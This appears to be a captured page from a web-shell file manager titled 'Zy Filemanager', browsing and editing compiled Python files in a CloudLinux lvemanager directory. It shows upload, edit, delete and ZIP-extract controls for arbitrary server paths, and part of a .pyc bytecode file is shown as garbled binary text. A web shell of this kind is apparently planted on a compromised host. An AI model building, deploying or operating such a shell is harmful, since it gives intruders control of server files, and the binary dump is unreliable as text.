⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
lvemanager
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-311.pyc
(418 bytes)
418 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
config_parser.cpython-311.pyc
(4,964 bytes)
4.85 KB
0644
📅
✏️
✍️
⬇️
🗑️
📄
sudoers.cpython-311.pyc
(5,557 bytes)
5.43 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: config_parser.cpython-311.pyc
File: /opt/cloudlinux/venv/lib/python3.11/site-packages/lvemanager/__pycache__/config_parser.cpython-311.pyc
Size: 4.85 KB | Last Modified: 2026-05-26 13:31:24
💾 Backup File
🔢 Toggle Line Numbers
� ���i � �t � d dl mZ d dl mZ d dl mZ d dlmZ d dlmZ d dl m Z G d� dej � � Zd S ) � )�print_function)�division)�absolute_import)�configparser)�StringIO)� basestringc �6 � e Zd ZdZd� Zd� Zd� Zd� Zd� Zd� Z dS ) �SectionlessConfigParserz� Extends ConfigParser to allow files without sections. This is done by wrapping read files and prepending them with a placeholder section, which defaults to '__config__' c � � |� dd � � }t j j | g|�R i |�� d | _ | � |pd� � d S )N�default_section� __config__)�pop�ConfigParser�RawConfigParser�__init__�_default_section�set_default_section)�self�args�kwargsr s �O/opt/cloudlinux/venv/lib64/python3.11/site-packages/lvemanager/config_parser.pyr z SectionlessConfigParser.__init__ sa � � �*�*�%6��=�=���$�-�d�D�T�D�D�D�V�D�D�D� $���� � ��!@�L�A�A�A�A�A� c � � | j S �N)r )r s r �get_default_sectionz+SectionlessConfigParser.get_default_section s � ��$�$r c � � | � |� � | � | j � � }| � | j � � |D ]\ }}| � |||� � �n# t j $ r Y nw xY w|| _ d S r )�add_section�itemsr �remove_section�setr �NoSectionError)r �section�default_section_items�key�values r r z+SectionlessConfigParser.set_default_section"